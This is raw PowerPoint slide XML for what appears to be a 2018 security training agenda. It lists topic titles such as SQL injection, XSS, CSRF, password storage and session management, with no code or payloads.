          <p:cNvPr id="933"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934"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935" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="936"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9"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210"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11" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="216" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-227492" y="656995"/>
            <a:ext cx="23067080" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23067078" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="213" name="Story Time!"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2384019" y="635000"/>
              <a:ext cx="2068306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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Story Time!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="214" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2172668" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="215" name="1."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="449604" y="624293"/>
              <a:ext cx="127346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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>1.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="220" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-227492" y="2128377"/>
            <a:ext cx="23067080" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23067078" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="217" name="SQL Injection"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2384019" y="635000"/>
              <a:ext cx="2068306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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>SQL Injection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="218" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2172668" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="219" name="2."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="449604" y="624293"/>
              <a:ext cx="127346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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>2.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="224" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-214792" y="3599758"/>
            <a:ext cx="23054380" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23054378" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="221" name="Storing Passwords"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2371319" y="635000"/>
              <a:ext cx="2068306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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Storing Passwords</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="222" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2172668" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="223" name="3."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="436904" y="624293"/>
              <a:ext cx="127346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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>3.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="228" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-227492" y="5071140"/>
            <a:ext cx="23067080" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23067078" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="225" name="Encryption"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2384019" y="635000"/>
              <a:ext cx="2068306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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Encryption</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="226" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2172668" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="227" name="4."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="449604" y="624293"/>
              <a:ext cx="127346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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>4.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="232" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-227492" y="6542522"/>
            <a:ext cx="23067080" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23067078" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="229" name="Secret Management"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2384019" y="635000"/>
              <a:ext cx="2068306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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Secret Management</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="230" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2172668" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="231" name="5."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="449604" y="624293"/>
              <a:ext cx="127346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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>5.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="236" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-227492" y="8013904"/>
            <a:ext cx="23067080" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23067078" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="233" name="Cross-Site Scripting (XSS)"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2384019" y="635000"/>
              <a:ext cx="2068306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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Cross-Site Scripting (XSS)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="234" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2172668" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="235" name="6."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="449604" y="624293"/>
              <a:ext cx="127346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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>6.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="240" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-227492" y="9485286"/>
            <a:ext cx="23067080" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23067078" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="237" name="Cross-Site Request Forgery (CSRF)"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2384019" y="635000"/>
              <a:ext cx="2068306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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Cross-Site Request Forgery (CSRF)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="238" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2172668" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="239" name="7."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="449604" y="624293"/>
              <a:ext cx="127346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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>7.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="244" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-227492" y="10956667"/>
            <a:ext cx="23067080" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23067078" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="241" name="Account Enumeration"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2384019" y="635000"/>
              <a:ext cx="2068306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5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Account Enumeration</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="242" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2172668" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" spc="0" sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="243" name="8."/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="449604" y="624293"/>
              <a:ext cx="127346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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>8.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="248" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1499349" y="656995"/>
            <a:ext cx="23167181" cy="1270001"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="23167180" cy="1270000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="245" name="Session Management"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="635000"/>
              <a:ext cx="20683059"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r">
                <a:defRPr sz="5800">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Session Management</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="246" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="20994512" y="0"/>
              <a:ext cx="2172669" cy="1270000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
